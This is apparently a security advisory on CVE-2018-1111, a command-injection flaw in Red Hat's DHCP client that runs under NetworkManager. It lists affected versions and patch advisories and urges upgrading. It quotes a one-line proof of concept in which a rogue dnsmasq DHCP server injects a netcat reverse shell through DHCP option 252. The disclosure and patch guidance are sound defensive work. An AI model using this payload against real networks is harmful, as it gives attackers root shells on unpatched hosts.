On May 15, Red Hat officially issued a notice that it fixed a DHCP Client related vulnerability (CVE-2018-1111). When the system uses NetworkManager and configures the DHCP protocol, an attacker can use a malicious DHCP server or DHCP response constructed by the local network to execute arbitrary commands on the system with root privileges.
#CVE-2018-1111 tweetable PoC 🙂 dnsmasq –interface=eth0 –bind-interfaces –except-interface=lo –dhcp-range=10.1.1.1,10.1.1.10,1h –conf-file=/dev/null –dhcp-option=6,10.1.1.1 –dhcp-option=3,10.1.1.1 –dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #" cc: @cnbrkbolat pic.twitter.com/vUICm2HluC
— Barkın Kılıç (@Barknkilic) May 15, 2018
CVE-2018-1111 Affected Versions
- Red Hat Enterprise Linux Server 6
- Red Hat Enterprise Linux Server 7
CVE-2018-1111 Unaffected Version
| Product | Package | Advisory/Update |
| Red Hat Enterprise Linux 7 (z-stream) | dhclient | RHSA-2018:1453 |
| Red Hat Enterprise Linux 7.4 Extended Update Support * | dhclient | RHSA-2018:1455 |
| Red Hat Enterprise Linux 7.3 Extended Update Support * | dhclient | RHSA-2018:1456 |
| Red Hat Enterprise Linux 7.2 Advanced Update Support, Telco Extended Update Support, and Update Services for SAP Solutions **,***,**** | dhclient | RHSA-2018:1457 |
| Red Hat Enterprise Linux 6 (z-stream) | dhclient | RHSA-2018:1454 |
| Red Hat Enterprise Linux 6.7 Extended Update Support * | dhclient | RHSA-2018:1458 |
| Red Hat Enterprise Linux 6.6 Advanced Update Support and Telco Extended Update Support **,*** | dhclient | RHSA-2018:1459 |
| Red Hat Enterprise Linux 6.5 Advanced Update Support ** | dhclient | RHSA-2018:1460 |
| Red Hat Enterprise Linux 6.4 Advanced Update Support ** | dhclient | RHSA-2018:1461 |
Solution
The official version of Red Hat has released a new version to fix the above vulnerabilities. Users should upgrade and protect them in time.
Because NetworkManager is enabled by default in a DHCP-based environment, it is strongly recommended that affected users install updates as soon as possible.
